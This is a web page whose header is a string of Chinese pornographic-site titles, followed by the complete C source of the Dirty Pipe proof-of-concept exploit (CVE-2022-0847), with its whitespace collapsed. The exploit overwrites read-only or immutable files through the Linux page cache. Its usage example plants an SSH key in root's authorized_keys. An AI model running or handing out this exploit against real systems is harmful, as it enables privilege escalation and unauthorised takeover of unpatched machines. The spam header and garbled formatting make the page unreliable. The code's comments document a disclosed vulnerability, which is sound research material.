国产成人毛片毛片久久网_国产午夜激无码av毛片不_国产乱对白精彩在线播放_av资源站中文字幕_亚洲男人的天堂网站_国产成 人 综合 亚洲网_中国国产激情一区_少妇一级淫片免费放_亚洲一本大道av久在线播放_免费观看美女裸体网站

                        /* SPDX-License-Identifier: GPL-2.0 *//* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <max.kellermann@ionos.com> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */#define_GNU_SOURCE#include<unistd.h>#include<fcntl.h>#include<stdio.h>#include<stdlib.h>#include<string.h>#include<sys/stat.h>#include<sys/user.h>#ifndefPAGE_SIZE#definePAGE_SIZE4096#endif/** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */staticvoidprepare_pipe(intp[2]){  if (pipe(p)) abort();  constunsignedpipe_size=fcntl(p[1], F_GETPIPE_SZ);  staticcharbuffer[4096];  /* fill the pipe completely; each pipe_buffer will now have     the PIPE_BUF_FLAG_CAN_MERGE flag */for (unsignedr=pipe_size; r>0;) {    unsignedn=r>sizeof(buffer) ?sizeof(buffer) : r;    write(p[1], buffer, n);    r-=n;  }  /* drain the pipe, freeing all pipe_buffer instances (but     leaving the flags initialized) */for (unsignedr=pipe_size; r>0;) {    unsignedn=r>sizeof(buffer) ?sizeof(buffer) : r;    read(p[0], buffer, n);    r-=n;  }  /* the pipe is now empty, and if somebody adds a new     pipe_buffer without initializing its "flags", the buffer     will be mergeable */}intmain(intargc, char**argv){  if (argc!=4) {    fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);    returnEXIT_FAILURE;  }  /* dumb command-line argument parser */constchar*constpath=argv[1];  loff_toffset=strtoul(argv[2], NULL, 0);  constchar*constdata=argv[3];  constsize_tdata_size=strlen(data);  if (offset%PAGE_SIZE==0) {    fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");    returnEXIT_FAILURE;  }  constloff_tnext_page= (offset| (PAGE_SIZE-1)) +1;  constloff_tend_offset=offset+ (loff_t)data_size;  if (end_offset>next_page) {    fprintf(stderr, "Sorry, cannot write across a page boundary\n");    returnEXIT_FAILURE;  }  /* open the input file and validate the specified offset */constintfd=open(path, O_RDONLY); // yes, read-only! :-)if (fd<0) {    perror("open failed");    returnEXIT_FAILURE;  }  structstatst;  if (fstat(fd, &st)) {    perror("stat failed");    returnEXIT_FAILURE;  }  if (offset>st.st_size) {    fprintf(stderr, "Offset is not inside the file\n");    returnEXIT_FAILURE;  }  if (end_offset>st.st_size) {    fprintf(stderr, "Sorry, cannot enlarge the file\n");    returnEXIT_FAILURE;  }  /* create the pipe with all flags initialized with     PIPE_BUF_FLAG_CAN_MERGE */intp[2];  prepare_pipe(p);  /* splice one byte from before the specified offset into the     pipe; this will add a reference to the page cache, but     since copy_page_to_iter_pipe() does not initialize the     "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */--offset;  ssize_tnbytes=splice(fd, &offset, p[1], NULL, 1, 0);  if (nbytes<0) {    perror("splice failed");    returnEXIT_FAILURE;  }  if (nbytes==0) {    fprintf(stderr, "short splice\n");    returnEXIT_FAILURE;  }  /* the following write will not create a new pipe_buffer, but     will instead write into the page cache, because of the     PIPE_BUF_FLAG_CAN_MERGE flag */nbytes=write(p[1], data, data_size);  if (nbytes<0) {    perror("write failed");    returnEXIT_FAILURE;  }  if ((size_t)nbytes<data_size) {    fprintf(stderr, "short write\n");    returnEXIT_FAILURE;  }  printf("It worked!\n");  returnEXIT_SUCCESS;}